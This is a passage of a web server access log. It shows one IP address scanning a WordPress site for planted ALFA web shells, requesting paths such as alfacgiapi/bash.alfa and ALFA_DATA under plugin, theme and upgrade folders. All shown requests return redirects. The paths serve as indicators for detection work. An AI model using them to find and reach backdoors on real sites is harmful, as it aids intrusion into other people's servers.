/wp-content/plugins/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 285 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:56 -0400] "GET /wp-content/plugins/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 285 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:11:59:56 -0400] "GET /wp-content/plugins/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:03 -0400] "POST /wp-content/plugins/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:04 -0400] "POST /wp-content/plugins/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:04 -0400] "POST /wp-content/plugins/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:04 -0400] "POST /wp-content/plugins/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:04 -0400] "POST /wp-content/plugins/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:04 -0400] "POST /wp-content/plugins/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:04 -0400] "GET /wp-content/plugins/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:05 -0400] "GET /wp-content/plugins/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:05 -0400] "GET /wp-content/plugins/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 293 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:08 -0400] "POST /wp-content/themes/alfacgiapi/perl.alfa HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:08 -0400] "POST /wp-content/themes/alfacgiapi/perl.alfa HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:08 -0400] "POST /wp-content/themes/alfacgiapi/bash.alfa HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:09 -0400] "POST /wp-content/themes/alfacgiapi/bash.alfa HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:09 -0400] "POST /wp-content/themes/alfacgiapi/py.alfa HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:09 -0400] "POST /wp-content/themes/alfacgiapi/py.alfa HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:09 -0400] "GET /wp-content/themes/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 284 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:09 -0400] "GET /wp-content/themes/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 284 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:09 -0400] "GET /wp-content/themes/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 282 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:26 -0400] "POST /wp-content/themes/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:26 -0400] "POST /wp-content/themes/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:26 -0400] "POST /wp-content/themes/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:27 -0400] "POST /wp-content/themes/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:27 -0400] "POST /wp-content/themes/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 277 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:27 -0400] "POST /wp-content/themes/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 277 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:27 -0400] "GET /wp-content/themes/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 294 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:28 -0400] "GET /wp-content/themes/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 294 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:28 -0400] "GET /wp-content/themes/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 292 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:49 -0400] "POST /wp-content/upgrade/alfacgiapi/perl.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:49 -0400] "POST /wp-content/upgrade/alfacgiapi/perl.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:49 -0400] "POST /wp-content/upgrade/alfacgiapi/bash.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:49 -0400] "POST /wp-content/upgrade/alfacgiapi/bash.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:49 -0400] "POST /wp-content/upgrade/alfacgiapi/py.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:50 -0400] "POST /wp-content/upgrade/alfacgiapi/py.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:50 -0400] "GET /wp-content/upgrade/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 285 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:50 -0400] "GET /wp-content/upgrade/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 285 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:50 -0400] "GET /wp-content/upgrade/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:51 -0400] "POST /wp-content/upgrade/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:52 -0400] "POST /wp-content/upgrade/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:52 -0400] "POST /wp-content/upgrade/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:52 -0400] "POST /wp-content/upgrade/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:52 -0400] "POST /wp-content/upgrade/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:52 -0400] "POST /wp-content/upgrade/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:52 -0400] "GET /wp-content/upgrade/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:52 -0400] "GET /wp-content/upgrade/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:53 -0400] "GET /wp-content/upgrade/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 293 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:59 -0400] "POST /wp-content/updraft/alfacgiapi/perl.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:59 -0400] "POST /wp-content/updraft/alfacgiapi/perl.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:59 -0400] "POST /wp-content/updraft/alfacgiapi/bash.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:59 -0400] "POST /wp-content/updraft/alfacgiapi/bash.alfa HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:59 -0400] "POST /wp-content/updraft/alfacgiapi/py.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:00:59 -0400] "POST /wp-content/updraft/alfacgiapi/py.alfa HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:00 -0400] "GET /wp-content/updraft/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 285 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:00 -0400] "GET /wp-content/updraft/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 285 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:00 -0400] "GET /wp-content/updraft/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:09 -0400] "POST /wp-content/updraft/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:09 -0400] "POST /wp-content/updraft/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:09 -0400] "POST /wp-content/updraft/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:10 -0400] "POST /wp-content/updraft/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 280 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:10 -0400] "POST /wp-content/updraft/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:10 -0400] "POST /wp-content/updraft/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:10 -0400] "GET /wp-content/updraft/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:10 -0400] "GET /wp-content/updraft/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:10 -0400] "GET /wp-content/updraft/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 293 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:17 -0400] "POST /wp-content/plugins/library/alfacgiapi/perl.alfa HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:17 -0400] "POST /wp-content/plugins/library/alfacgiapi/perl.alfa HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:18 -0400] "POST /wp-content/plugins/library/alfacgiapi/bash.alfa HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:18 -0400] "POST /wp-content/plugins/library/alfacgiapi/bash.alfa HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:18 -0400] "POST /wp-content/plugins/library/alfacgiapi/py.alfa HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:18 -0400] "POST /wp-content/plugins/library/alfacgiapi/py.alfa HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:18 -0400] "GET /wp-content/plugins/library/alfacgiapi/index.php?bx=0e215962017 HTTP/1.1" 301 293 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:18 -0400] "GET /wp-content/plugins/library/alfacgiapi/radio.php?bx=0e215962017 HTTP/1.1" 301 293 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:19 -0400] "GET /wp-content/plugins/library/alfacgiapi/404.php?bx=0e215962017 HTTP/1.1" 301 291 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:20 -0400] "POST /wp-content/plugins/library/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:20 -0400] "POST /wp-content/plugins/library/ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:20 -0400] "POST /wp-content/plugins/library/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:20 -0400] "POST /wp-content/plugins/library/ALFA_DATA/alfacgiapi/bash.alfa HTTP/1.1" 301 288 "-" "Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:01:21 -0400] "POST /wp-content/plugins/library/ALFA_DATA/alfacgiapi/py.alfa HTTP/1.1" 301 286 "-" 